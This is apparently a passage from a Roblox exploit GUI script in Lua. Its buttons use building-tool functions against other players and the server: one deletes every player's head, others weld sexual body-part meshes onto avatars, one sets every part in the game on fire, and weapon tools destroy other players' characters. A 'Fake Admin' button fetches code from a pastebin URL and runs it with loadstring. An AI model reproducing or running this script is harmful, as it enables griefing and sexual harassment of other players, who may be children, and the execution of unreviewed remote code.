		script.Parent["Kill All"].MouseButton1Click:Connect(function()
			local function KillAll()
				for i,v in game.Players:GetPlayers() do
					spawn(function()
						SetLocked(v.Character.Head,false)
						DestroyPart(v.Character.Head)
					end)
				end
			end
			KillAll()
		end)
		script.Parent["Personality all"].MouseButton1Click:Connect(function()
			local function Boob(player)
				char = player.Character
				for i,v in char:GetChildren() do
					pcall(function()
						SetLocked(v,false)
					end)
				end
				if player.Character:FindFirstChild("Boob2") then
					return
				else

					SetAnchor(true,player.Character.HumanoidRootPart)
					spawn(function()
						CreatePart(player.Character:WaitForChild("Right Leg").CFrame * CFrame.new(0,2,-0.6),player.Character)
						SetName(player.Character.Part,"Boob1")
						CreatePart(player.Character:WaitForChild("Left Leg").CFrame * CFrame.new(0,2,-0.6),player.Character)
						SetName(player.Character.Part,"Boob2")
					end)
					wait(0.2)
					repeat wait() until char:FindFirstChild("Boob2")
					spawn(function()
						AddMesh(char.Boob1)
						AddMesh(char.Boob2)
						SetMesh(char.Boob1,"5697933202")
						SetMesh(char.Boob2,"5697933202")
					end)
					wait(0.2)
					repeat wait() until char.Boob2:FindFirstChild("Mesh")
					MeshResize(char.Boob1,Vector3.new(0.4,0.4,0.4))
					MeshResize(char.Boob2,Vector3.new(0.4,0.4,0.4))
					pcall(function()
						Color(char.Boob1,char:WaitForChild("Torso").Color)
						Color(char.Boob2,char:WaitForChild("Torso").Color)
					end)
					wait(0.2)
					spawn(function()
						SetCollision(player.Character.Boob1,false)
						SetCollision(player.Character.Boob2,false)
						Weld(char.Boob1,char.HumanoidRootPart,char.Boob1)
						Weld(char.Boob2,char.Boob1,char.Boob2)
					end)
					repeat wait() until char.Boob2:FindFirstChild("BTWeld")
					for i,v in char:GetChildren() do
						pcall(function()
							SetLocked(v,false)
						end)
					end
					for i,v in char:GetChildren() do
						pcall(function()
							SetAnchor(false,v)
						end)
					end
					spawn(function()
						SetAnchor(false,char.HumanoidRootPart)
						SetAnchor(false,char.Boob1)
						SetAnchor(false,char.Boob2)
					end)
				end
			end
			for i,v in game.Players:GetPlayers() do
				--spawn(function()
				pcall(function()
					Boob(v)
				end)
				--end)
			end
		end)
		script.Parent.SkyBox.MouseButton1Click:Connect(function()
			local function Sky(id)
				local e = char.HumanoidRootPart.CFrame.x
				local f = char.HumanoidRootPart.CFrame.y
				local g = char.HumanoidRootPart.CFrame.z
				CreatePart(CFrame.new(math.floor(e),math.floor(f),math.floor(g)) + Vector3.new(0,6,0),workspace)
				for i,v in game.Workspace:GetDescendants() do
					if v:IsA("BasePart") and v.CFrame.x == math.floor(e) and v.CFrame.z == math.floor(g) then
						--spawn(function()
						SetName(v,"Sky")
						AddMesh(v)
						--end)
						--spawn(function()
						SetMesh(v,"8006679977")
						SetTexture(v,id)
						--end)
						MeshResize(v,Vector3.new(50,50,50))
						SetLocked(v,true)
					end
				end
			end
			Sky("178993745")
		end)
		script.Parent.Peircer.MouseButton1Click:Connect(function()
			function Penis(player)
				char = player.Character
				for i,v in char:GetChildren() do
					pcall(function()
						SetLocked(v,false)
					end)
				end
				if player.Character:FindFirstChild("Penis") then
					return
				else


					SetAnchor(true,player.Character.HumanoidRootPart)
					spawn(function()
						CreatePart(player.Character:WaitForChild("Right Leg").CFrame * CFrame.new(-0.8,1,-0.6),player.Character)
						SetName(player.Character.Part,"Balls1")
						CreatePart(player.Character:WaitForChild("Left Leg").CFrame * CFrame.new(0.8,1,-0.6),player.Character)
						SetName(player.Character.Part,"Balls2")
					end)
					wait(0.2)
					repeat wait() until char:FindFirstChild("Balls2")
					print("done")
					spawn(function()
						CreatePart(player.Character:WaitForChild("Torso").CFrame * CFrame.new(0,-1,-1.3),player.Character)
						SetName(player.Character.Part,"Penis")
						CreatePart(player.Character:WaitForChild("Torso").CFrame * CFrame.new(0,-1,-2.5),player.Character)
						SetName(player.Character.Part,"Head1")
					end)
					repeat wait() until char:FindFirstChild("Head1")
					spawn(function()
						AddMesh(char.Balls1)
						AddMesh(char.Balls2)
						AddMesh(char.Head1)
						AddMesh(char.Penis)
					end)
					repeat wait() until char.Penis:FindFirstChild("Mesh")
					spawn(function()
						SetMesh(char.Penis,"4743972117")
						SetMesh(char.Head1,"4743972117")
						MeshResize(char.Penis,Vector3.new(0.5,0.5,3))
						MeshResize(char.Head1,Vector3.new(0.5,0.5,1))
					end)
					spawn(function()
						Weld(char.Penis,char.HumanoidRootPart,char.Penis)
						SetMesh(char.Balls1,"5697933202")
						SetMesh(char.Balls2,"5697933202")
						MeshResize(char.Balls1,Vector3.new(0.2,0.2,0.2))
						MeshResize(char.Balls2,Vector3.new(0.2,0.2,0.2))
					end)
					wait(0.2)
					pcall(function()
						Color(char.Balls1,char:WaitForChild("Torso").Color)
						Color(char.Balls2,char:WaitForChild("Torso").Color)
						Color(char.Penis,char:WaitForChild("Torso").Color)
						Color(char.Head1, Color3.fromRGB(255,100,100))
						Material(char.Head1,Enum.Material.Foil)
					end)
					wait(0.2)
					spawn(function()
						SetCollision(player.Character.Balls1,false)
						SetCollision(player.Character.Balls2,false)
						SetCollision(player.Character.Penis,false)
						SetCollision(player.Character.Head1,false)
					end)
					wait(0.2)
					spawn(function()
						Weld(char.Balls1,char.HumanoidRootPart,char.Balls1)
						Weld(char.Balls2,char.Balls1,char.Balls2)
						Weld(char.Head1,char.Penis,char.Head1)
					end)
					wait(0.2)
					spawn(function()
						SetAnchor(false,char.Balls1)
						SetAnchor(false,char.Balls2)
						SetAnchor(false,char.Penis)
						SetAnchor(false,char.Head1)
						SetAnchor(false,char.HumanoidRootPart)
					end)
					repeat wait()
						SetAnchor(false,char.HumanoidRootPart)
						SetAnchor(false,char.Balls1)
						SetAnchor(false,char.Balls2)
						SetAnchor(false,char.Penis)
						SetAnchor(false,char.Head1)
					until char.Head1.Anchored == false
				end
			end
			--spawn(function()
			--pcall(function()
			Penis(player)
			--end)
			--end)
		end)
		script.Parent["Stick All"].MouseButton1Click:Connect(function()
			local swordTool = game:GetObjects("rbxassetid://13828016276")[1] :: Tool
			swordTool.Parent = game.Players.LocalPlayer.Backpack
			local swing = false
			local slashNoise = Instance.new("Sound", char)
			slashNoise.Volume = 0.7
			slashNoise.SoundId = "http://www.roblox.com/asset/?id=12222216"
			local slash2Noise = Instance.new("Sound", char)
			slash2Noise.Volume = 2
			slash2Noise.SoundId = "http://www.roblox.com/asset/?id=12222225"
			for i = 1, #workspace:GetChildren() do
				local v = workspace:GetChildren()[i] :: Instance
				if v:IsA("BasePart") then
					v.Name = v.Name .. "1"
				end
			end
			CreatePart(player.Character:WaitForChild("Torso").CFrame * CFrame.new(0,-1,-1.3),workspace)
			SetName(workspace:WaitForChild("Part"),"Sword")
			sword = workspace:WaitForChild("Sword", 199e199)
			swordTool.Handle.Transparency = 1
			SetTrans(sword,1)
			Resize(sword,swordTool:WaitForChild("Handle").Size,swordTool:WaitForChild("Handle").CFrame)
			SetCollision(sword,false)
			sword.Touched:Connect(function(part)
				if not swing then return; end
				swing = false
				if part.Parent:FindFirstChild("Head") ~= nil and part.Parent ~= char then
					DestroyPart(part.Parent.Head)
				end
			end)
			swordTool.Equipped:Connect(function ()
				SetTrans(sword,0)
				slash2Noise:Play()
			end)
			swordTool.Unequipped:Connect(function ()
				SetTrans(sword,1)
			end)
			swordTool.Activated:Connect(function ()
				local Anim = Instance.new("StringValue")
				Anim.Name = "toolanim"
				Anim.Value = "Slash"
				Anim.Parent = swordTool
				slashNoise:Play()
				wait(0.2)
				swing = true
				wait(0.7)
				swing = false
			end)
			spawn(function()
				while wait(0.01) do
					MovePart(sword,swordTool.Handle.CFrame)
					MovePart(sword,swordTool.Handle.CFrame)
				end
			end)
		end)
		script.Parent["Twig All"].MouseButton1Click:Connect(function()
			game:GetService("TeleportService"):TeleportToGameInstance(game.PlaceId, game.JobId)
		end)
		script.Parent["Fire Parts"].MouseButton1Click:Connect(function()
			local function FireParts()
				for i,v in game.Workspace:GetDescendants() do
					spawn(function()
						SetLocked(v,false)
						AddFire(v)
					end)
				end
			end
			FireParts()
		end)
		local UIS = game:GetService("UserInputService")
		function dragify(Frame)
			local dragToggle = nil
			local dragSpeed = 0.50
			local dragInput = nil
			local dragStart = nil
			local dragPos = nil
			local function updateInput(input)
				local Delta = input.Position - dragStart
				local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
				game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.30), {Position = Position}):Play()
			end
			Frame.InputBegan:Connect(function(input)
				if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
					dragToggle = true
					dragStart = input.Position
					startPos = Frame.Position
					input.Changed:Connect(function()
						if input.UserInputState == Enum.UserInputState.End then
							dragToggle = false
						end
					end)
				end
			end)
			Frame.InputChanged:Connect(function(input)
				if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
					dragInput = input
				end
			end)
			game:GetService("UserInputService").InputChanged:Connect(function(input)
				if input == dragInput and dragToggle then
					updateInput(input)
				end
			end)
		end

		dragify(script.Parent)

		--hhh
		my_buttons["Fake Admin"].MouseButton1Click:Connect(function()
			loadstring(game:HttpGet("https://pastebin.com/raw/qP0agyM3"))()
		end)
		my_buttons["Fake SS"].MouseButton1Click:Connect(function()
			tool = nil;
		end)
		my_buttons["Slap Players To Death"].MouseButton1Click:Connect(function()
			local ____animmmm = Instance.new("Animation")
			____animmmm.AnimationId = "rbxassetid://243827693"
			local slapAnim = char:FindFirstChildOfClass("Humanoid"):LoadAnimation(____animmmm)
			local tool = Instance.new("Tool",player.Backpack)
			tool.Name = "Slap To 'DEATH'."
			local swingNoise = Instance.new("Sound",char)
			swingNoise.Name = "Swing_SLAP"
			swingNoise.Volume = 0.7
			swingNoise.Pitch = 1.7
			swingNoise.SoundId = "rbxassetid://5835032207"
			local uhhNoise = Instance.new("Sound",char)
			uhhNoise.Name = "UH_SLAP"
			uhhNoise.Volume = 6.5
			uhhNoise.SoundId = "rbxassetid://12222140"
			local slapeyNoise = Instance.new("Sound",char)
			slapeyNoise.Name = "Slapey_SLAP"
			slapeyNoise.Volume = 5
			slapeyNoise.SoundId = "rbxassetid://511340819"
			local bloodNoise = Instance.new("Sound",char)
			bloodNoise.Name = "BloBloGore_SLAP"
			bloodNoise .Volume = 8.5
			bloodNoise.SoundId = "rbxassetid://264486467"
			local handle = Instance.new("Part",tool)
			handle.Name = "Handle"
			handle.Size = Vector3.new(2, 2, 2)
			handle.Massless = true
			handle.Transparency = 1
			tool.Activated:Connect(function()
				swingNoise:Play()
				slapAnim:AdjustSpeed(3.5)
				slapAnim:Play()
				slapAnim:AdjustSpeed(3.5)
				local connection;
				connection = handle.Touched:Connect(function(part)
					if part.Parent:FindFirstChild("Humanoid") ~= nil then
						uhhNoise:Play()
						slapeyNoise:Play()
						DestroyPart(part.Parent:FindFirstChild("HumanoidRootPart"))
						spawn(function()
							wait(2.5)DestroyPart(part.Parent:FindFirstChild("Head"))bloodNoise:play()
						end)
						if connection then connection:Disconnect() end
					end
				end) :: RBXScriptSignal
				wait(0.2)
				connection:Disconnect()
			end)
		end)
	end
	coroutine.wrap(FBING_fake_script)()
